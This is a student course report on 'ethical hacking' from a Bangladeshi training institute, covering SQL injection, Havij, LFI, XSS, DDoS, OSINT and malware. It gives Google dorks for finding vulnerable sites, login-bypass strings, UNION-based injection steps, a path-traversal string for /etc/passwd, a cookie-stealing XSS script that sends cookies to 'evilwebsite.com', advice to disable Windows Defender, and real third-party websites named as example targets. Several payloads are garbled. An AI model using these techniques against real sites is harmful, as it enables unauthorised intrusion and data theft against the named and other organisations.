Ethical hacking

There is a thesis Report Based on Ethical Hacking & Cyber security

Submitted to
Tanjim Al Fahim
Supervisor of batch 42 delta

Submitted by
MD. Nur-Alom
Student of batch 42 Delta
On March 7

Arena Web Security

Declaration by Student:
I, MD Nur Alom I am currently a first-year honors mathematics student at Government
Titumir College in Bangladesh. This thesis was completed by myself under the
supervision of Tanjim Al Fahim and has not been published or submitted elsewhere.

MD Nur Alo m

Arena Web Secur it y

Bat ch: 42 Delt a

Dat e :07 March 2023

Certificate:
It is certifiable that this thesis is all about ethical hacking, and I have been doing it at the
institution of Arena Web Security for the last three months. I have learned everything
about ethical hacking. All the topics have been described very well.This thesis part has
not been submitted for the academic awards of any other university or institution.

Countersigned signature

---------------------------- -----------------------------

( Tanjim Al Fahim) (MD Nur Alom)

Supervisor of Batch 42 delta Student of batch 42 Delta

Abstract:
Hacking is a popular online problem for common people nowadays. Common people
cannot easily escape from black-hat hackers.An ethical hacker always prepares to help
them. An ethical hacker is always ready to help organizations protect their data from
black hat hackers Ethical hacking is an important information security risk.
management strategy used by businesses and academic institutions to protect
their information assets from the growing threat of hackers.

Ethical hacking
It is now a common and preferred method for analyzing security systems.
Programs of an organization. It runs parallel with security judgment, red teaming, and
intrusion.Testing, and vulnerability. Here are certain important points that will help you
understand more. about ethical hacking and its necessity.

Acknowledgement:
I would like to express my sincere gratitude to our honorable course instructor and
supervisor ,Tanjim Al Fahim Sir, Jewel Sir, Ashif Islam Sir, and all the moderators and
administrators for their ongoing assistance.effort and invertible suggestion throughout the
research.
I am really grateful to them.I would also like to thank all my coursemates in this course
who have advised, helped, and suggested.need of the entire courses whenever I got stuck
at some point.
Thank you.
Table of contents:

1. BASIC SQL INJECTION 5–7

2. HAVIJ 8–9

3. NOREDIRECT 10

4. MANUAL SQL INJECTION 11 – 12

5. LOCAL FILE INCLUSION (LFI) 12 – 14

6. CROSS-SITE SCRIPTING (XSS) 15 – 17

7. DDOS 17

8. GRABIFY 18

9. OSINT 18 – 19

10. MALWARE 20 – 21

11. SOCIAL MEDIA ACCOUNT RECOVER 22

12. HTTP & HTTPS 23

13. BLACLLIST REMOVAL 24

14. CONCLUTION 24
Basic SQL Injection:
SQL Injection is a vulnerability that allows data to be manipulated via a website's code
injection method. SQL injection usually occurs when you ask a user for input, like their
username/userid, and instead of a name/id, the user gives you an SQL statement that you
will unknowingly run on your database.

First, we have to know what the vulnerability of a website is.A web vulnerability is a
flaw in a website or web application.Application code that allows an attacker to gain
some level of control of the site, and possiblythe hosting server. If the vulnerability of a
website is quite large, if it has a low or high level of if there is a possibility, it is possible
for the bad guys or attackers to attack it.

So to find such a vulnerable website, we need the help of Google Dork. So

What is Google Dork?

Google hacking is a computer hacking technique that uses Google Search and
other Google applications to find security holes in the configuration and computer
code that websites use.We can find all of the websites that have vulnerabilities for this at
Google Dork.
First, we need to search on Google using Google Dork. Here are some examples of lists.
google dork:

Google Dorks compilation to find SQL injections:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid= inurl:games.php?id=

inurl:page.php?file=
inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:view_product.php?id=

There are different ways to attack and get access to a website. In this part, we have
learned:
about basic SQL.

User: 1 'or' 1 '=' 1

Pass: 1 'or' 1 '=' 1

By using this user name and password, we can access many websites. admin panel. The
working method of this injection is

On the internet, each and every website has a datebase. We become allergic when we
enter the incorrect username and False Quary. But if we put the above query in the
username and password field, then the database willaccept it as true and grant the attacker
unauthorised access.

Example:
http://www.covid19maluku.com/
https://technopk.com/
HAVIJ:
Habij is an SQL injection tool that aids in the discovery and exploitation of SQL
vulnerabilities on websites. The working method of Havij is

First of all, we have to install Havij on our PC, and we must recognize that our PC's
Windows Defender must be disabled; otherwise, Windows will not allow Havij to be
installed on the computer.

After opening the Havij tool, we have to put the target URL on the target and click
analyze, and Havij will begin analyzing. We receive information after a few minutes.
After we've obtained coolum, we'll click on the table and then click get table. Then we'll
have a lot of files from which to choose our desired file, and after that, we'll have to click
get column; after that, we'll have a few files from which to choose our desired file, then
click get data, and we'll get our final data.

We can get data from Havij by following the steps outlined above.

To work on Havij, we must keep in mind that the S must be removed.

from "https" and put only "http" in the search box.

We should keep in mind that Havij only works on dynamic websites that have a php id
that begins witha value of 1, 2, 3, etc., or any numeric data. For instance, php id=29

Some Google Dorks:

1: intitle:"index" of "admin" site:.in or others domain name

2: intitle:"index" of "admin" "framework" site:.in or others domain name

3: intitle:"index" of "admin" "pdf" site:.in or others domain name

4: intitle:"index" of "admin" "gallery" site:.in or others domain name

5: intitle:"index" of "admin" "image" site:.in or others domain name

6: intitle:"index" of "admin" "upload" site:.in or others domain name

7: intitle:"index" of "admin" "banner" site:.in or others domain name

8: intitle:"index" of "admin" "file" site:.in or others domain name

9: intitle:"index" of "admin" "page" site:.in or others domain name

10: intitle:"index" of "admin" "news" site:.in or others domain name

http://www.megaplanet.co.th/project-details.php?id=26

http://www.pha.org.pk/sro_list.php?catid=1
NO REDIRECT:
Noredirect is another method of SQL injection. For use of this method, we have to use a
browser named "Cyber Fox." We used to go to the Tools menu after installing Cyberfox
and select Noredirect. Then click "add" and enter the URL link to which we want to
redirect.

Due to the redirect addons, we have blocked the admin page.

After that, we will search with the same link below, removing the letters after admin. If
still,won't take us to the dashboard, then we have to look for the other address for the
admin panel.For this, we will go to the next step below.

Example:
https://www.hotfm.com.pk/admin/login.php
Manual SQL Injection:
To perform manual SQL injection, we must have a dynamic website, such as
http://www.megaplanet.co.th/project-details.php?id=26. For use of a single string ('), we
have to find the vulnerable website.

Every website has a database. Where they kept all information. In every database, the
main information is stored in the columns and rows. So first off all, we will find out how
many columns there are on this website by using:

6 Order by 1-- (INT)

6' Order by 1---+

(STRING [6 is the number of id; like php?id=6 and 1 is the number of columns]

6 Union select 1,2,3,4,5,6-- (INT)

6' Union select 1,2,3,4,5,6--+

(STRING) [Are sorted 1-6 in sequence. might have to use (-/.) This. Like this Id=-6 or
id=.6]

After this step, Which column is most vulnerable to attack in that column for get the
database.

These steps are following for attacking.

Union based ->DIOS My SQL ->DIOS by WAF (if it not worked then try another one)
(Copy DIOS link and execute in New tab)

Then get data from those columns.

6Union select 1,2,3,4,5, group_concat(column name) from (__data name__)-- (INT)

6'Union select 1,2,3,4,5, group_concat(column name) from (__data name__)--

+(STRING)
Local File Inclusion(LFI):
A file inclusion vulnerability is a type of web vulnerability that is most commonly
found to affect web applications that rely on scripting at run time. This issue is caused
when an application builds a path to executable code using an attacker-controlled variable
in a way that allows the attacker to control which file is executed at run time. A file
include vulnerability is distinct from a generic directory traversal attack, in that directory
traversal is a way of gaining unauthorized file system access, and a file inclusion
vulnerability subverts how an application loads code for execution. Successful
exploitation of a file inclusion vulnerability will result in remote code execution on
the web server that runs the affected web application. An attacker can use remote code
execution to create a web shell on the web server, which can be used for website
defacement.

LFI stands for "local file inclusion." A local file inclusion bug is discovered.
when a developer includes user input in a PHP file. Local file inclusion (LFI) is similar to
a remote file inclusion vulnerability, except instead of including remote files, only local
files, i.e., files on the current server, can be included for execution. This issue can still
lead to remote code execution by including a file that contains attacker-controlled data,
such as the web server's access logs.

An attacker can use Local File Inclusion (LFI) to trick the web application.
into exposing or running files on the web server. An LFI attack may lead
to information disclosure, remote code execution, or even cross-site
Scripting (XSS). Typically, LFI occurs when an application uses the path
to a file as input. If the application treats this input as trusted, a local
file may be used in the include statement.

LFI is not a very common vulnerability. Not every website has a local file inclusion
vulnerability. It is present in 1% of web applications on average. LFI can be dangerous
when combined with other vulnerabilities; for example,if the attacker is able to upload
malicious files to the server.Even if the attacker cannot upload files, they can use the
LFI.vulnerability together with a directory traversal vulnerability to access
sensitive information.

How LFI works:

When a user enters a file into an application without having it properly validated, this is known
as a local file inclusion. By tampering with the input, an attacker can use this weakness to insert
harmful files.

By replacing end data of a URL with (../../../../../../../../../etc/passwd) then the server read
the url and get the necessary data or harmful files.

For example
http://www.scsi4me.com/display.php?page=Contact.php&nav_title=Contact Us

http://www.bharathcateringcollege.com/index.php?page=contact.php
Cross Site Scripting (XSS):

Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web
applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by
other users. A cross-site scripting vulnerability may be used by attackers to bypass access
controls such as the same-origin policy. Cross-site scripting carried out on websites accounted
for roughly 84% of all security vulnerabilities documented by Symantec up until 2007. [1] XSS
effects vary in range from petty nuisances to significant security risks, depending on the
sensitivity of the data handled by the vulnerable site and the nature of any security mitigation
implemented by the site's owner network.

If a web page or web application employs unsensitized user input in the output it generates, it is
susceptible to XSS. The victim's browser must analyze this user input. ActiveX, Flash, VBScript,
and even CSS all support XSS attacks. Nonetheless, they are most frequently seen in JavaScript,
mainly since JavaScript is used for the majority of browser activities.

If any site has XSS functionality, the problem is that it is not only Java or malicious code,
but in many cases, it can be malware, phishing, or inject.

JavaScript is a cross-platform, object-oriented scripting language. A big advantage of

JavaScript is that it can do a lot of work or produce a lot of output with the help of very
small programs or codes. In other words, JavaScript is a client-side scripting language
(that is, the browser of the web browser will run or execute these scripts) or browser
scripting language (a simple and short form of programming language).

A hacker can do whatever he wants, including phishing, keylogging, and cookie theft.

How XSS works

Here’s an example:
<script> i=new/**/Image();isrc=http://evilwebsite.com/log.php?'+document.cookie+'
'+document.location</script>
While the payload is usually JavaScript, XSS can take place using any client-side
language.
To carry out a cross site scripting attack, an attacker injects a malicious script into
user-provided input. Attackers can also carry out an attack by modifying a request. If
the web app is vulnerable to XSS attacks, the user-supplied input executes as code.
For example, in the request below, the script displays a message box with the text
“xss.”
http://www.site.com/page.php?var=<script>alert('xss');</script>
There are many ways to trigger an XSS attack. For example, the execution could be
triggered automatically when the page loads or when a user hovers over specific
elements of the page (e.g., hyperlinks).
Potential consequences of cross site scripting attacks include these:

 Capturing the keystrokes of a user.

 Redirecting a user to a malicious website.
 Running web browser-based exploits (e.g., crashing the browser).
 Obtaining the cookie information of a user who is logged into a website (thus
compromising the victim’s account).

In some cases, the XSS attack leads to a complete compromise of the victim’s
account. Attackers can trick users into entering credentials on a fake form, which
provides all the information to the attacker.
https://www.brothersfurniture.com.bd/search/reading-table/?q=table
https://www.q-files.com/search

DDOS:
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the bandwidth
or resources of a targeted system, usually one or more web servers. A DDoS attack uses more
than one unique IP address or machine, often from thousands of hosts infected with malware.

A website has some limited access, like a few users using it at the same time. If many
users use the same website at the same time, then the website has traffic and the server
does not respond.

If a hacker wants to take down a website, then he/she does DDoS by using brute force.
By doing Brut, a hacker forced many unusual users to login or use a website at the same
time because the site was down. Because only a few users visited a website, the server
did not respond well. DDoS works like that.
GRABIFY:
A URL shortening company called Grabify shortens lengthy URLs and offers extra detailed
information, such IP logging. To stop people from catfishing others, a link shortener called
Grabify was first developed. Nevertheless, since the website's introduction in 2014, users have
discovered a variety of other applications for it, including website analytics and an IP logging
daemon that records users' IPs each time they switch on their PCs so they have a record of
everything

OSINT:
OSINT is the short form of Open Source Intelligence. Open Source Intelligence (OSINT) is a
method of gathering information from public or other open sources that can be used by
security experts, national intelligence agencies, or cybercriminals. When used by cyber
defenders, the goal is to discover publicly available information related to their
organization that could be used by attackers and take steps to prevent those future attacks.

Here are three methods commonly used to gain open intelligence data.

Passive Collection:
This is the most commonly used way to gather OSINT intelligence. It involves scraping publicly
available websites, retrieving data from open APIs such as the Twitter API, or pulling data from
deep web information sources. The data is then parsed and organized for consumption.

Semi-Passive:

This type of collection requires more expertise. It directs traffic to a target server to
obtain information about the server. Scanner traffic must be similar to normal Internet
traffic to avoid detection.

Active Collection:

This type of information collection interacts directly with a system to gather information about it.
Active collection systems use advanced technologies to access open ports and scan servers or
web applications for vulnerabilities.

This type of data collection can be detected by the target and reveals the reconnaissance process.
It leaves a trail in the target’s firewall, Intrusion Detection System (IDS), or Intrusion Prevention
System (IPS). Social engineering attacks on targets are also considered a form of active
intelligence gathering.
MALWARE:

Malware, or malicious software, is any program or file that is intentionally harmful to

a computer, network, or server.

Computer viruses, worms, Trojan horses, ransomware, and spyware are examples of
malware. These harmful applications steal, encrypt, and erase private information.
They also change or hijack fundamental computer operations and track end users'
online behavior.

Malware is able to infiltrate networks and devices and is designed with the intention
of negatively affecting such devices, networks, and/or their users. This damage may
manifest itself to the user or endpoint in many ways depending on the type of malware
and its objective. Malware can have very benign and minor effects in some situations,
but it can also have devastating effects in others. No matter the technique, all malware
is created to take advantage of devices at the expense of the user and in favor of the
hacker—the person who created and/or used the software.

Types of malwares:

• Computer viruses

• Trojan horses

• Rootkits

• Ransomware

• Keyloggers

• Grayware

• Fileless malware

• Adware

• Malvertising

• Spyware

• Backdoors

• Browser hijackers
• Malicious mobile apps

• Hybrid malware

How to Prevent Malware To prevent malware, it's vital to use a protection in depth
strategy that focuses on technical and non-technical solutions. Phishing emails are
one of the most common dirt paths, so it's vital to educate employees about
phishing and to avoid downloading doubtful addons or engaging with emails. Also
look out for doubtful domains or typosquatting that masquerades as legitimate
websites. Don't download third-party apps on Android devices and avoid clicking
pop-up ads. How to Detect Malware

There are a several general symptoms that may specify the presence of malware on
your device 1- Your device running slower than regular 2- You notice a shortage
of available storage space 3- Pop-ups and annoying programs seem on your device
4- Your sensitive data has been exposed

How to remove malware Anti-malware (antivirus) programs block and remove

some or all types of malwares. Example, Microsoft Security Essentials (Windows
XP, Vista, and Windows 7) and Windows Defender (Windows 8, 10 and 11)
delivers real-time protection. The windows malicious software removal tool
removes malicious software from the device
SOCIAL MEDEA ACCOUNT RECOVER:
Nowadays, social media is a famous activity around the world. Almost 90% of the
world's population uses Facebook, Instagram, Twitter, and Whatsapp, but Facebook is the
most popular app.

In our city, most users forget their Facebook passwords after a few months, and
sometimes hackers want to access their accounts because of their short passwords and
low varification.

The simple recovery method for Facebook passwords is

1. Go to the Facebook login page and click forget password."

2. After you do that, put your email or phone number in the search bar.
3. Facebook sent a verification code to your phone or email.
4. Open a new page after entering the verification code into Facebook.
5. Then Facebook will ask you to put in a new password.

This is the formal process to recover an account.

There are many other process to recover hack account or disable account
HTTP & HTTPS:
The full form of HTTP is Hypertext Transfer Protocol. HTTP offers a set of rules and standards
that govern how any information can be transmitted on the World Wide Web. HTTP provides
standard rules for web browsers and servers to communicate. HTTP is an application-layer
network protocol that is built on top of TCP. HTTP uses hypertext-structured text, which
establishes the logical link between nodes containing text. It is also known as "stateless
protocol," as each command is executed separately without using reference to the previous run
command.

HTTPS stands for Hyper Text Transfer Protocol Secure. It is a highly advanced and secure
version of HTTP. It uses port 443 for data communication. It allows for secure transactions by
encrypting the entire communication with SSL. It is a combination of the SSL/TLS protocol and
HTTP. It provides encrypted and secure identification of a network server.

HTTP also allows you to create a secure, encrypted connection between the server and the
browser. It offers bi-directional security for data. This helps you protect potentially sensitive
information from being stolen.

In the HTTPS protocol, SSL transactions are negotiated with the help of a key-based encryption
algorithm. This key is generally either 40 or 128 bits in strength.

Advantages of HTTP

 HTTP can be implemented with other protocols on the Internet or on other

networks.
 HTTP pages are stored in computer and internet caches, so they are quickly
accessible.
 Platform-independent, which allows cross-platform porting
 Does not need any runtime support.
 Usable over firewalls! Global applications are possible.
 Not connection-oriented, so there is no network overhead to create and maintain
session state and information.

Advantages of HTTPS

 In most cases, sites running over HTTPS will have a redirect in place. Therefore,
even if you type in HTTP://, it will redirect to https over a secured connection.
 It allows users to perform secure e-commerce transactions, such as online banking.
 SSL technology protects all users and builds trust.
 An independent authority verifies the identity of the certificate owner. So each
SSL certificate contains unique, authenticated information about the certificate
owner.
BLACKLIST REMOVAL:
If your IP address is blacklisted and you want to examine it, you have to visit the blacklist’s
website and do a lookup on your IP address. Most blacklist databases will provide general listing
reasons but won’t list exact email addresses tied to blacklisted IP addresses. If you are able to
find out why you were blacklisted, you can try to get it back. You want to work with someone
who is technically sound to better help you. To start with, take time to confirm your network and
mail server are confirmed properly and all the details are in order for resolving the issue, as
prescribed by the blacklist. For example, they may ask you to provide accurate forward and
reverse DNS records, as well as SMPT banners.

You can do the following:

• Scan all computers on your network for viruses.

• See if there are any known and needed patches (updates and fixes) for your operating system.

• Configure routers more strongly.

• Create and apply stronger passwords.

You want to be removed from any backlists because databases frequently share IP addresses that
have been recorded. If you think you have fixed things on your end, go back to the backlist site
and follow their instructions for the IP address removal process.

Conclution:
I would like to say that this course has enriched my knowledge on ethical hacking, not to
harm others but to know how an exploit or attack might happen so that we can keep
ourselves alert from any kind of attack from the attackers. The prime purpose of ethical
hacking is to prevent sensitive data from falling into enemy hands. It safeguards your
company from blackmail by those willing to exploit the vulnerabilities. Through real-
world testing, you can enhance your digital network security and prevent security
breaches.